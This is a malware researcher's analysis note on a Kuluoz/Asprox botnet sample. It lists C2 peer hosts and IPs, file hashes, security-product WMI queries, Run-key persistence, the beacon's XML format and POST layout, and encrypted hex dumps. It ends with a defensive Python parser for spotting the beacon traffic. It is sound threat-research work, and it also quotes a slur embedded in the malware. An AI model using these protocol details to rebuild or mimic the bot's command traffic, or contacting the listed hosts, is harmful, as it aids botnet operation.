MalwareMustDie

BOTNET KULUOZ/ ASPROX BACK WITH NEW ENCRYPTION

Nov 12th, 2013
==========================
#MalwareMustDie
BOTNET KULUOZ/ ASPROX BACK WITH NEW ENCRYPTION
@unixfreaxjp /malware/temp]$ date
Tue Nov 12 22:23:08 JST 2013

Peers (hosts) on port 8080:

66-29-254-132.ds1-static.mia1.net.ststelecom.com
mail.colegioamazonas.edu.ec
hosted-by.shineservers.com
host.colocrossing.com
web.globalcell.ge
gunnebojohnson.com
==========================


SAMPLE ANALYZED:

https://www.virustotal.com/en/file/1b78b14147d61ea245e588eb208c49bf678da968938751155f06d0f2a8a189b1/analysis/

MD5    ec52855b7e522a977330519a8a201993
SHA1   b09e1a0fb067f2114e186bba5d848dbd7d663325
SHA256 1b78b14147d61ea245e588eb208c49bf678da968938751155f06d0f2a8a189b1

// ==============================
// QUICK REVERSING ANALYSIS:
// ==============================

// Accessing the Security Center (via WMI):

ROOT\SecurityCenter
ROOT\SecurityCenter2
SELECT * FROM AntiVirusProduct

ROOT\SecurityCenter
ROOT\SecurityCenter2
SELECT * FROM FirewallProduct


// Grabbing which security solution you use (the product's displayName):

displayName


// Series of POST request commands:
// explanation: the URL name and port number are in variables, for proxies.


http://%[^:]:%d/%s

// The User-Agent used is static (not a variable), a plaintext string in the binary (need to decrypt the binary to see it)
// The method is POST
// The hash for the request was structured as "yvy5VtvLVvh6soaja2YuyfrC" in my case.
// Plaintext was used for the POST form fields: name="key"; filename="key.bin" and name="data"; filename="data.bin"
// It is bound to svchost.exe

Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
GET
yvy5VtvLVvh6soaja2YuyfrC
svchost.exe
Content-Type: multipart/form-data; boundary=
Content-Disposition: form-data; name="key"; filename="key.bin"
Content-Type: application/octet-stream
svchost.exe
Content-Disposition: form-data; name="data"; filename="data.bin"
Content-Type: application/octet-stream
Content-Length: %d

// Requested command:

/index.php?r=gate

Which posts the infected host's ID data in the form:

<knock><id>%s</id><group>%s</group><time>%d</time><version>%d</version><status>%d</status><debug>%s</debug></knock>


// Yes, it is supposed to autorun from:

Software\Microsoft\Windows\CurrentVersion\Run

// Self-copied to:

C:\Documents and Settings\User\Local Settings\Application Data\goktqtbh.exe (random name..)

// Kicking Notepad:

0x4c0 svchost.exe C:\WINDOWS\system32\svchost.exe
0x768 notepad.exe C:\WINDOWS\system32\NOTEPAD.EX

with the text...

FATAL ERROR! Error while open file.

(hex: 464154414C204552524F5221204572726F72207768696C65206F70656E2066696C652E00 )


// Botnet (fake?) version..

1.0.6, 6-Sept-2010


// Still the same rant detected.. see my previous pastebin:

You fag!!!!!
You fag!!!!!
You fag!!!!!
You fag!!!!!
You fag!!!!!
You fag!!!!!
You fag!!!!!
You fag!!!!!
You fag!!!!!
You fag!!!!!

// Added with these:

For base!!!!!
For base!!!!!
For base!!!!!
For base!!!!!
For base!!!!!
For base!!!!!
For base!!!!!


// ==================
// ENCRYPTION TRACES
// ==================

// Data was encrypted using:

Microsoft Base Cryptographic Provider v1.0

// Public key traces...



// Lots of MD5 calls..

MD5Init
MD5Update
MD5Final


=============================
RESPONSE FROM KULUOZ PEERS
=============================


// DOWNLOADED DATA...


// data.bin

0000 FD B1 64 DF 81 18 D7 F6 9D CB 3A 79 48 B9 BC B9 ..d.......:yH...
0010 1E FC C4 7C 3B 1B 0D BF 7A 3E DA 98 4D 09 C3 1B ...|;...z>..M...
0020 81 CF EF DF 4E 3A DA ED 69 B0 B9 3E 2F 45 BA 09 ....N:..i..>/E..
0030 B5 6C 06 71 D1 A7 15 AA EF B9 A9 7D 27 81 F3 BA .l.q.......}'...
0040 92 F6 B7 46 95 C0 06 03 02 DD 0B C1 D9 96 90 27 ...F...........'
0050 5F E5 FB E7 B8 C2 9A C8 72 85 A4 41 F5 2F B0 5A _.......r..A./.Z
0060 C4 D8 D8 9C 1A 00 63 C3 24 39 6F 23 DA 96 89 63 ......c.$9o#...c
0070 F2 8D 0D 15 B3 29 40 D4 91 1B 07 18 22 7E ED B4 .....)@....."~..
0080 56 FE D4 42 CF C2 8C 97 19 A9 99 E8 4B 1C 72 9C V..B........K.r.
0090 9B 4F AA DF A2 BB BE 72 58 11 7E 8C E1 0A 59 .O.....rX.~...Y


// ===> Decrypted, this is supposed to look like the following (example only):
// But I cannot figure out the encryption yet...
// All previous attempts failed...

0000 31 34 39 2e 32 31 30 2e 31 33 30 2e 31 38 3a 39 149.210.130.18:9
0010 39 33 0a 31 38 36 2e 31 31 32 2e 32 31 34 2e 31 93.186.112.214.1
0020 35 38 3a 38 30 38 30 0a 32 30 32 2e 32 39 2e 32 58:8080.202.29.2
0030 32 39 2e 32 33 32 3a 38 30 38 30 0a 31 37 38 2e 29.232:8080.178.
0040 32 30 38 2e 33 35 2e 31 39 30 3a 38 30 38 30 0a 208.35.190:8080.
0050 36 34 2e 37 36 2e 31 39 2e 32 34 31 3a 38 30 38 64.76.19.241:808
0060 30 0a 39 35 2e 31 37 33 2e 31 38 36 2e 31 38 34 0.95.173.186.184
0070 3a 38 30 38 30 0a 31 37 36 2e 31 32 32 2e 32 32 :8080.176.122.22
0080 34 2e 36 32 3a 38 30 38 30 0a 38 32 2e 31 39 32 4.62:8080.82.192
0090 2e 39 31 2e 32 32 34 3a 38 30 38 30 0a 38 34 2e .91.224:8080.84



// key.bin (not figured out yet...)

0000 50 AA B1 3A 7E 51 02 90 D7 D4 C1 0D 52 48 AF EE P..:~Q......RH..
0010 EA 86 86 6F D3 96 EF 15 22 98 35 B9 15 96 2D B1 ...o....".5...-.
0020 27 83 2E DE B7 3B B5 EB BA 74 78 E8 22 28 5D 49 '....;...tx."(]I
0030 B8 B1 00 A0 3C 10 D0 95 EB 03 67 7C 51 06 3B D7 ....<.....g|Q.;.
0040 1A 95 1E 7E BF 65 C0 CC 36 C2 D0 A2 E3 6D 24 F9 ...~.e..6....m$.
0050 9A CE D0 26 1B 0A A4 5E 6F FA 50 80 6C 22 57 24 ...&...^o.P.l"W$
0060 26 D9 2F 0D EE F4 80 31 8D 26 24 DC 86 00 D0 DB &./....1.&$.....
0070 CF 31 EE C1 CF 9D AA EC 83 3C 99 75 ED 76 62 45 .1.......<.u.vbE


// Encrypted request in the POST... ps: yvy5VtvLVvh6soaja2YuyfrC is my hashed PC ID


// HEADER:

POST /3D498A785E9515E72E2C4E241766ADFDF3DFED4670 HTTP/1.1
Accept: */*
Content-Type: multipart/form-data; boundary=yvy5VtvLVvh6soaja2YuyfrC
Content-Length: 592
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0
Host: 220.67.211.23:8080
Cache-Control: no-cache

// DATA...

yvy5VtvLVvh6soaja2YuyfrC
Content-Disposition: form-data; name="key"; filename="key.bin"
Content-Type: application/octet-stream

......ON?..u..Y..1.Kf`!.9.*...~.........Ey..p..[>_..S..4/%.N.L4....D.d.....)
.V....56b.k..E....z.'l.......*..3.h..........w....N
--yvy5VtvLVvh6soaja2YuyfrC

Content-Disposition: form-data; name="data"; filename="data.bin"
Content-Type: application/octet-stream

.:.U.7T.I..O.{ym....,.i...&.s....U.|....|..z.....$&.........e..v+.6.[....3..........C...W..". h...&I..$t
/E..4....<KOk....Qt..m.4~.Q|".I..U..u....")a_z$#d..j...
--yvy5VtvLVvh6soaja2YuyfrC--


// The two encrypted blobs above, dumped as hex:

// ==> Decrypted, this is supposed to match the format below (from binary reversing).
// We need to know the encryption used in order to pop out the values of

id, group, time, version, status and debug.

<knock><id>%s</id><group>%s</group><time>%d</time><version>%d</version><status>%d</status><debug>%s</debug></knock>


Please take this research from here..

---
#MalwareMustDie!
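As an added example (my own code, not part of the original paste), a small Python parser that splits a captured beacon POST of the shape shown above into its key/data parts and reports the Kuluoz traits this analysis lists: the static Firefox 23 User-Agent, the hashed bot ID reused as the multipart boundary, and the key.bin/data.bin uploads. The capture is constructed from the request above with placeholder blob bytes; the 24-character alphanumeric shape of the boundary is an assumption drawn from this one sample.

```python
import re

B = b"yvy5VtvLVvh6soaja2YuyfrC"  # hashed bot id, reused as the multipart boundary
SAMPLE_POST = (  # constructed capture modelled on the beacon above; blob bytes are placeholders
    b"POST /3D498A785E9515E72E2C4E241766ADFDF3DFED4670 HTTP/1.1\r\n"
    b"Content-Type: multipart/form-data; boundary=" + B + b"\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0\r\n"
    b"Host: 220.67.211.23:8080\r\n\r\n--" + B + b"\r\n"
    b'Content-Disposition: form-data; name="key"; filename="key.bin"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n\x50\xaa\xb1\x3a\r\n--" + B + b"\r\n"
    b'Content-Disposition: form-data; name="data"; filename="data.bin"\r\n'
    b"Content-Type: application/octet-stream\r\n\r\n\xfd\xb1\x64\xdf\r\n--" + B + b"--\r\n"
)
KULUOZ_UA = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0"

def parse_request(raw):
    """Split a raw HTTP request into (method, headers dict, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(b":")
        headers[k.strip().lower().decode()] = v.strip().decode()
    return lines[0].split(b" ")[0].decode(), headers, body

def split_parts(body, boundary):
    """Map part name -> (filename, payload); '--' is optional since the dump above omits it on the first delimiter."""
    delim = rb"(?:^|\r\n)(?:--)?" + re.escape(boundary) + rb"(?:--)?(?:\r\n|$)"
    parts = {}
    for chunk in re.split(delim, body):
        hdr, _, payload = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        m = re.search(rb'name="([^"]*)"(?:; filename="([^"]*)")?', hdr)
        if m:
            parts[m.group(1).decode()] = ((m.group(2) or b"").decode(), payload)
    return parts

def kuluoz_indicators(raw):
    """Return the beacon traits from the analysis above that a raw POST shows, plus its parts."""
    method, headers, body = parse_request(raw)
    hits = []
    if method == "POST" and headers.get("user-agent") == KULUOZ_UA:
        hits.append("static-firefox23-ua")
    boundary = (re.findall(r"boundary=(\S+)", headers.get("content-type", "")) + [""])[0]
    # Assumption from this one sample: the bot id is a 24-char alphanumeric token.
    if re.fullmatch(r"[A-Za-z0-9]{24}", boundary):
        hits.append("bot-id-as-boundary")
    parts = split_parts(body, boundary.encode()) if boundary else {}
    if {n: f for n, (f, _) in parts.items()} == {"key": "key.bin", "data": "data.bin"}:
        hits.append("key.bin+data.bin-upload")
    return hits, parts
```

The extracted `key` and `data` payloads are the two blobs a defender would hand to cryptanalysis; the traits list is what a proxy or IDS rule would key on.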